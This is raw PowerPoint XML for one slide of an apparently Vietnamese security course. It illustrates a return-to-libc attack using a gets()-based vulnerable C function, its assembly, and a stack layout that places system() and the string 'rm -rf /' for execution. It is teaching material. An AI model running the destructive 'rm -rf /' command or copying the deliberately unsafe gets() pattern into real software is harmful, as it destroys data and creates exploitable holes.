              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CC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38761D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'B' * 4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="38761D"/>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1155CC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[address of "rm -rf /"]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="16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"rm -rf /"</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCA019E-C636-F760-82F3-A0BE2818990F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="609600"/>
            <a:ext cx="381000" cy="3733800"/>
            <a:chOff x="8610600" y="3733800"/>
            <a:chExt cx="228600" cy="609600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Connector 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2314FFBA-AF71-B5E5-B8EA-BDEBCD8D5EAA}"/>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CAD080-428C-6BE8-4765-E4314C8B81DA}"/>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70DB31-845D-E078-67F8-771354123CD4}"/>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279B38D-0590-F19D-2FDF-CC913C34DF29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7806256" y="-76200"/>
            <a:ext cx="956744" cy="1234996"/>
            <a:chOff x="761773" y="198248"/>
            <a:chExt cx="1522825" cy="1965711"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 2" descr="Breezeeweezee Cosplay Blog">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70A805FC-35E7-5090-F556-9D6C22225C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5E2311F-86ED-D42D-2169-B0CF8B168A43}"/>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C5B8790-6148-1401-7021-7A57313FE32B}"/>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B92A6D9-75AB-9869-B258-3C4E6FCD207C}"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6471A8AD-92DC-7142-2066-5739D028A222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5257800" y="4038600"/>
            <a:ext cx="638402"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150202-57F1-4247-9B7B-9462A6ACF750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5257800" y="3735288"/>
            <a:ext cx="0" cy="303312"/>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674B78-621F-9668-3B23-CF8322247805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3989213" y="3735288"/>
            <a:ext cx="1268587"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511E96-19EB-8E1D-3EDB-9CA520B8A44C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5486400" y="3429000"/>
            <a:ext cx="409802"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2F804-97D1-C3CC-A8BE-064965C0A0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5486400" y="3125688"/>
            <a:ext cx="0" cy="303312"/>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8B08BE-F3B7-89AC-229D-4C5D21BB7D70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3124200"/>
            <a:ext cx="409802"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65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B7E8-3B1E-5AAF-6667-635A51FC98C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Return-to-libc: Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C12EEE-F2C5-4A83-9DF7-81236A0482BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434340" y="1221480"/>
            <a:ext cx="5661660" cy="531120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kẻ tấn công muốn thực thi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>system(“rm -rf /“)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2237D6-4C91-EC43-10BE-8F5279F06BB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{791D2753-D3A3-C0DA-C42E-BAE7711031C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1447800"/>
          <a:ext cx="2714397" cy="488208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'\0'</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'r'</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'f'</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 '</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'r'</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'm'</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 '</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a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="CC0000"/>
                        </a:solidFill>
                        <a:latin typeface="Courier New"/>
                        <a:ea typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                        <a:sym typeface="Courier New"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45700" marR="4570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 sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of "rm -rf /"]</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lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'BBBB'</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 sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of system()]</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b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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algn="ct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6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE568C8-D254-9B74-CB00-DFADF7516014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3735288"/>
            <a:ext cx="2163977" cy="203129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void vulnerable(void)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char name[20];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gets(name);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int main(void)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return 0;</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a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;913;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206A0B2F-40DB-0A0C-91DD-33C2BFCBA237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3352800"/>
            <a:ext cx="2057400" cy="295462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dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ystem:</a:t>
            </a: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p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en"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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>call gets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    addl $4,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movl %ebp, %esp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popl %ebp</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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">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main:</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    call vulnerable</a:t>
            </a:r>
            <a:endParaRPr sz="12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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    ...</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2B4563-85CE-7870-F62F-6FEA2061EC51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2286000" y="3581400"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC5D43B-AB7D-DA56-C6CB-371954AE8C5A}"/>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10" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDE7118-E75A-7E80-650E-36848854BD7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FF9A6837-BE7D-BD3E-2133-EE1C2C2E9FC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5080000" y="3597216"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305DBA8E-E319-44A8-5AD9-71A94BFB2EF0}"/>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12" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE5788F-E002-6A37-AF43-A36311544417}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="11"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27" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DD3038-633B-1B36-1369-9A2124F52AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7071059" y="685021"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C6CE66-00CE-2389-21FA-3A975E6B8FA8}"/>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14" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25504682-9FEF-1C74-AE61-2F3B27397EED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13"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 name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCA019E-C636-F760-82F3-A0BE2818990F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="609600"/>
            <a:ext cx="381000" cy="3733800"/>
            <a:chOff x="8610600" y="3733800"/>
            <a:chExt cx="228600" cy="609600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Connector 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2314FFBA-AF71-B5E5-B8EA-BDEBCD8D5EAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8610600" y="4343400"/>
              <a:ext cx="228600"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CAD080-428C-6BE8-4765-E4314C8B81DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8839200" y="3733800"/>
              <a:ext cx="0" cy="60960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70DB31-845D-E078-67F8-771354123CD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8610600" y="3733800"/>
              <a:ext cx="228600"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279B38D-0590-F19D-2FDF-CC913C34DF29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7806256" y="-76200"/>
            <a:ext cx="956744" cy="1234996"/>
            <a:chOff x="761773" y="198248"/>
            <a:chExt cx="1522825" cy="1965711"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 2" descr="Breezeeweezee Cosplay Blog">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70A805FC-35E7-5090-F556-9D6C22225C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4303" y="902164"/>
              <a:ext cx="896539" cy="126179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5E2311F-86ED-D42D-2169-B0CF8B168A43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1173548">
              <a:off x="1797582" y="493574"/>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FC5B8790-6148-1401-7021-7A57313FE32B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19689705">
              <a:off x="761773" y="421563"/>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B92A6D9-75AB-9869-B258-3C4E6FCD207C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1360435" y="198248"/>
              <a:ext cx="487016" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
              <a:endParaRPr lang="vi-VN" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6471A8AD-92DC-7142-2066-5739D028A222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5257800" y="4038600"/>
            <a:ext cx="638402"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150202-57F1-4247-9B7B-9462A6ACF750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5257800" y="3735288"/>
            <a:ext cx="0" cy="303312"/>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674B78-621F-9668-3B23-CF8322247805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3989213" y="3735288"/>
            <a:ext cx="1268587"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511E96-19EB-8E1D-3EDB-9CA520B8A44C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5486400" y="3429000"/>
            <a:ext cx="409802" cy="0"/>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2F804-97D1-C3CC-A8BE-064965C0A0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5486400" y="3125688"/>
            <a:ext cx="0" cy="303312"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="F6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8B08BE-F3B7-89AC-229D-4C5D21BB7D70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3124200"/>
            <a:ext cx="409802" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="F6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582;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CEED942-43AA-C108-53EF-AD6173BA1E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551132" y="1820641"/>
            <a:ext cx="4401867" cy="1169521"/>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Khi hàm </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> trả về, con trỏ EIP nhảy tới hàm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system</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, và tham số được truyền vào là 4 byte trên con trỏ ESP, tức là địa chỉ của xâu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"rm -rf /"</a:t>
            </a:r>
            <a:r>
